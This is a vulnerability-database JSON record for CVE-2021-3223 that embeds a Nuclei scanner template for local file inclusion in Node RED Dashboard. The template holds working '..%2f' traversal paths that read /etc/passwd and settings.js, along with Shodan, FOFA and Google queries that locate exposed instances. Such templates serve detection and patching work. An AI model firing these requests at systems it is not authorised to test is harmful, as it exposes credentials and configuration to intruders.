{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-3223/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-3223/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-3223/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-3223/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-3223/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-3223"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-3223"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-3223.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2021-3223\n\ninfo:\n  name: Node RED Dashboard <2.26.2 - Local File Inclusion\n  author: gy741,pikpikcu\n  severity: high\n  description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.\n  impact: |\n    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n  remediation: |\n    Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.\n  reference:\n    - https://github.com/node-red/node-red-dashboard/issues/669\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223\n    - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-3223\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-3223\n    cwe-id: CWE-22\n    epss-score: 0.18512\n    epss-percentile: 0.97123\n    cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: nodered\n    product: node-red-dashboard\n    framework: node.js\n    shodan-query:\n      - title:\"Node-RED\"\n      - http.title:\"node-red\"\n    fofa-query:\n      - title=\"Node-RED\"\n      - title=\"node-red\"\n    google-query: intitle:\"node-red\"\n  tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'\n      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'\n\n    matchers-condition: or\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Node-RED web server is listening\"\n\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n# digest: 4b0a00483046022100d52bc24433692e2e3a39dd221e31c4f02de17e36e10ce5ddd682824ffe1bb3db022100a5cd157437045d511d82701f11edb01c7ea644a53bb86aa969fedad46d149f92:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-3223"
}